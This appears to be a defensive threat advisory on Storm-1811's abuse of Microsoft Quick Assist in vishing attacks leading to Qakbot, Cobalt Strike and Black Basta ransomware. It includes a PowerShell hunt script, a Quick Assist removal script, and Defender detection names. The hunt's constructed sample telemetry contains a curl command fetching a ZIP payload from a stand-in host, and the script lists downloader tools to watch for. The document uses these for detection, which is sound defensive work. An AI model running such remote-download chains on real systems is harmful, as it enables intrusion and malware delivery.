Since mid-April 2024, the financially motivated cybercriminal group Storm-1811 has been observed exploiting the Microsoft Quick Assist tool in social engineering attacks. The group, known for deploying Black Basta ransomware, begins its attack chain with voice phishing (vishing) to impersonate trusted contacts and deceive targets into granting remote access to their devices.

Misuse of Microsoft Quick Assist by Storm-1811: Technical Overview

Threat Actor: Storm-1811

Primary Tool Misused: Microsoft Quick Assist

Malware Deployed: Qakbot, Cobalt Strike, Black Basta ransomware

Attack Vectors: Vishing, Remote Monitoring and Management (RMM) tools, social engineering

Attack Chain:

  1. Initial Access via Vishing:
    • The threat actors initiate contact through voice phishing, pretending to be Microsoft technical support or the target’s IT personnel.
    • They exploit Quick Assist, a legitimate remote support tool pre-installed on Windows 11 devices, to gain control of the target’s system.
  2. Remote Monitoring Tools Deployment:
    • Once access is granted, the attackers use Quick Assist to run scripted cURL commands to download batch files or ZIP files.
    • These files deliver additional tooling, including RMM tools like ScreenConnect and NetSupport Manager, and the Qakbot malware.
  3. Further Intrusion and Ransomware Deployment:
    • The attackers perform domain enumeration and lateral movement within the compromised environment using tools like PsExec.
    • They deploy Cobalt Strike for persistence and eventually launch Black Basta ransomware to encrypt data and demand ransom.
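The chain above leaves a recognizable process lineage on the endpoint: the Quick Assist session host, a shell, and then a download utility fetching a batch or ZIP file. The following PowerShell hunt is an added example and is not code from the advisory or from Microsoft. It assumes one object per process-creation event carrying Image, ParentImage, CommandLine, ProcessId, ParentProcessId and User (the fields Sysmon Event ID 1 records); the sample events, user names, paths and URLs are constructed, and the Quick Assist binary path varies by Windows build.

```powershell
# Added example, not the advisory's own code. Input shape is assumed: one object
# per process-creation event with Image, ParentImage, CommandLine, ProcessId,
# ParentProcessId and User, which is what Sysmon Event ID 1 records.

function Find-QuickAssistDownloadChain {
    param(
        [Parameter(Mandatory)] [object[]] $Events
    )

    # Index events by PID so parent chains can be walked without re-scanning.
    $byPid = @{}
    foreach ($e in $Events) { $byPid[[int]$e.ProcessId] = $e }

    $sessionRoot    = 'quickassist.exe'                              # the remote-support session host
    $downloaders    = @('curl.exe', 'bitsadmin.exe', 'certutil.exe') # curl is what the advisory reports; the others are common stand-ins
    $payloadPattern = '\.(bat|zip)\b'                                # batch or ZIP payloads named in the attack chain

    foreach ($e in $Events) {
        # Split on either slash so the check works on any platform the script runs on.
        $image = (($e.Image -split '[\\/]')[-1]).ToLowerInvariant()
        if ($downloaders -notcontains $image) { continue }
        if ($e.CommandLine -notmatch $payloadPattern) { continue }

        # Walk ancestors (bounded) and report only if Quick Assist is in the chain.
        $chain     = @($image)
        $parentPid = [int]$e.ParentProcessId
        $hops      = 0
        while ($byPid.ContainsKey($parentPid) -and $hops -lt 8) {
            $parent      = $byPid[$parentPid]
            $parentImage = (($parent.Image -split '[\\/]')[-1]).ToLowerInvariant()
            $chain       = @($parentImage) + $chain
            if ($parentImage -eq $sessionRoot) {
                [PSCustomObject]@{
                    User        = $e.User
                    ProcessId   = $e.ProcessId
                    Chain       = ($chain -join ' -> ')
                    CommandLine = $e.CommandLine
                }
                break
            }
            $parentPid = [int]$parent.ParentProcessId
            $hops++
        }
    }
}

# Constructed sample events (not real telemetry). Paths, users and hosts are illustrative.
$sampleEvents = @(
    [PSCustomObject]@{ ProcessId = 4100; ParentProcessId = 900
                       Image = 'C:\Windows\System32\QuickAssist.exe'; ParentImage = 'C:\Windows\explorer.exe'
                       CommandLine = 'QuickAssist.exe'; User = 'CORP\jdoe' }
    [PSCustomObject]@{ ProcessId = 4120; ParentProcessId = 4100
                       Image = 'C:\Windows\System32\cmd.exe'; ParentImage = 'C:\Windows\System32\QuickAssist.exe'
                       CommandLine = 'cmd.exe'; User = 'CORP\jdoe' }
    [PSCustomObject]@{ ProcessId = 4133; ParentProcessId = 4120
                       Image = 'C:\Windows\System32\curl.exe'; ParentImage = 'C:\Windows\System32\cmd.exe'
                       CommandLine = 'curl -o C:\Users\jdoe\AppData\Local\Temp\helper.zip https://downloads.example.invalid/helper.zip'
                       User = 'CORP\jdoe' }
    # Control: same curl-to-ZIP pattern, but the parent chain ends at a build agent, not Quick Assist.
    [PSCustomObject]@{ ProcessId = 5000; ParentProcessId = 1
                       Image = 'C:\BuildAgent\agent.exe'; ParentImage = 'C:\Windows\System32\services.exe'
                       CommandLine = 'agent.exe'; User = 'CORP\svc_build' }
    [PSCustomObject]@{ ProcessId = 5010; ParentProcessId = 5000
                       Image = 'C:\Windows\System32\curl.exe'; ParentImage = 'C:\BuildAgent\agent.exe'
                       CommandLine = 'curl -o artifacts.zip https://ci.example.invalid/artifacts.zip'
                       User = 'CORP\svc_build' }
)

Find-QuickAssistDownloadChain -Events $sampleEvents | Format-Table -AutoSize

# With live data, build $Events from Sysmon instead, e.g.
# Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 }
# and map each event's Image/ParentImage/CommandLine/ProcessId/ParentProcessId/User fields.
```

The function only reports a download when Quick Assist appears among the process's ancestors, so the build-agent control events are deliberately not matched even though their curl command line fetches a ZIP; requiring the lineage rather than the curl invocation alone is what keeps the hunt from drowning in ordinary automation. Parent-chain walking is bounded at eight hops so a malformed or cyclic PID table cannot loop forever.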

Impact:

  • Organizations across various sectors, including manufacturing, construction, food and beverage, and transportation, have been targeted.
  • The attacks can result in significant operational disruption, data loss, and financial loss due to ransom payments and recovery costs.

What Our Threat Intelligence Team is Seeing

Microsoft Defender Antivirus

Microsoft Defender Antivirus detects Qakbot downloaders, implants, and behavior as the following malware:

  • TrojanDownloader:O97M/Qakbot
  • Trojan:Win32/QBot
  • Trojan:Win32/Qakbot
  • TrojanSpy:Win32/Qakbot
  • Behavior:Win32/Qakbot

Black Basta threat components are detected as:

  • Behavior:Win32/Basta
  • Ransom:Win32/Basta
  • Trojan:Win32/Basta

Microsoft Defender Antivirus detects Cobalt Strike Beacon running in a victim process with the following signatures:

  • Behavior:Win32/CobaltStrike
  • Backdoor:Win64/CobaltStrike
  • HackTool:Win64/CobaltStrike

Additional Cobalt Strike components are detected with the following signatures:

  • TrojanDropper:PowerShell/Cobacis
  • Trojan:Win64/TurtleLoader.CS
  • Exploit:Win32/ShellCode.BN

Microsoft Defender for Endpoint

Alerts with the following titles in the security center can indicate threat activity on your network:

  • Suspicious activity using Quick Assist

The following alerts might also indicate activity related to this threat:

  • Suspicious curl behavior
  • A file or network connection related to a ransomware-linked emerging threat activity group detected — This alert captures Storm-1811 activity
  • Ransomware-linked emerging threat activity group Storm-0303 detected — This alert captures some Qakbot distributor activity
  • Possible Qakbot activity
  • Possible NetSupport Manager activity
  • Possibly malicious use of proxy or tunneling tool
  • Suspicious usage of remote management software
  • Ongoing hands-on-keyboard attacker activity detected (Cobalt Strike)
  • Human-operated attack using Cobalt Strike
  • Ransomware behavior detected in the file system

What We Suggest to Stop Misuse of Microsoft Quick Assist by Storm-1811

  1. Block or Uninstall Quick Assist:
    • Evaluate the necessity of Quick Assist and other RMM tools in your environment. If not required, block or uninstall them to reduce the attack surface.
  2. Enhance Employee Awareness:
    • Conduct training sessions to educate employees on recognizing vishing and tech support scams. Emphasize the importance of verifying unsolicited support calls.
  3. Implement Multi-Factor Authentication (MFA):
    • Enforce MFA for accessing sensitive systems and accounts to add an additional layer of security.
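For the first recommendation, the following PowerShell is an added example (not code from the advisory or from Microsoft) that audits whether Quick Assist is present on a Windows host and removes it on request. It covers the two packaging forms Microsoft has shipped, the Windows capability App.Support.QuickAssist and the Store package MicrosoftCorporationII.QuickAssist, and assumes it is run from an elevated session.

```powershell
# Added example, not the advisory's own code. Audits and optionally removes Quick
# Assist on a Windows host. Requires an elevated session; both packaging forms
# Microsoft has shipped are handled: the Windows capability App.Support.QuickAssist
# and the Store package MicrosoftCorporationII.QuickAssist.

function Get-QuickAssistState {
    $capability = Get-WindowsCapability -Online |
        Where-Object { $_.Name -like 'App.Support.QuickAssist*' }
    $storePkg = Get-AppxPackage -AllUsers -Name 'MicrosoftCorporationII.QuickAssist' -ErrorAction SilentlyContinue

    $capState = if ($capability) { ($capability.State | Select-Object -First 1) } else { 'NotPresent' }
    $pkgName  = if ($storePkg)   { ($storePkg.PackageFullName -join ', ') }      else { 'NotPresent' }

    [PSCustomObject]@{
        ComputerName    = $env:COMPUTERNAME
        CapabilityState = $capState
        StorePackage    = $pkgName
    }
}

function Remove-QuickAssist {
    [CmdletBinding(SupportsShouldProcess)]
    param()

    # Legacy capability (DISM-managed). Only entries in the 'Installed' state can be removed.
    $installedCaps = Get-WindowsCapability -Online |
        Where-Object { $_.Name -like 'App.Support.QuickAssist*' -and $_.State -eq 'Installed' }
    foreach ($cap in $installedCaps) {
        if ($PSCmdlet.ShouldProcess($cap.Name, 'Remove-WindowsCapability')) {
            Remove-WindowsCapability -Online -Name $cap.Name | Out-Null
        }
    }

    # Store package, removed from every user profile on the machine.
    $storePkgs = Get-AppxPackage -AllUsers -Name 'MicrosoftCorporationII.QuickAssist' -ErrorAction SilentlyContinue
    foreach ($pkg in $storePkgs) {
        if ($PSCmdlet.ShouldProcess($pkg.PackageFullName, 'Remove-AppxPackage')) {
            Remove-AppxPackage -Package $pkg.PackageFullName -AllUsers
        }
    }
}

# Audit first; preview the removal with -WhatIf before running it for real.
Get-QuickAssistState
# Remove-QuickAssist -WhatIf
# Remove-QuickAssist
# Get-QuickAssistState   # re-run to confirm both fields now read NotPresent
```

Run Get-QuickAssistState across the fleet before deciding anything: the advisory's first step is to evaluate whether the tool is needed, and an inventory tells you which hosts actually have it. Removal deals with the copies already installed; whether users can reinstall it from the Store is a separate policy decision that the "block" option in the recommendation covers.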
